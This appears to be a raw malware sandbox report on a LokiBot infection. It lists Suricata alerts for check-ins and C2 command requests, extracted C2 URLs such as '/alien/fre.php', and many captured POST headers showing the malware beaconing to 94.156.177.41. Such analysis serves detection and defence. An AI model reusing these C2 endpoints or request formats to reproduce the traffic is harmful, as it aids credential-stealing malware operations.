                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49973 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50000 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50000 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49924
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49929 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49929 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49968 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49973 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49960 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49935 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49968
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50014 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50014 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49973 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50014 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49973 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49929
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49960
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50032 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50014 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:50000
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49935 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49935 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50032 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50032 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50014 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49937 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49978
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49935
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49879 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:50014
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49879 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49879 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49937 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49990 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49990 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49990 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49879 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49879 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50020 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50020 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50020 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49879
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49990 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49990 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49937 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50020 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50020 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49990
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49943 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49994 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49943 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:50020
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49943 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49994 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49994 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49943 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49994 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49994 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49937
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49943 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49911 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49911 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49911 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49943
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49994
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49911 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49911 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49911
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49984 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49984 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49984 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49954 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49954 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49954 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49973
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49984 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49954 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49984 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49954 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49954
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49984
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50032 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:50032 -> 94.156.177.41:80
                          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                          Source: Malware configuration extractorURLs:
                          Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                          Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 188Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 188Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 161Connection: close
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
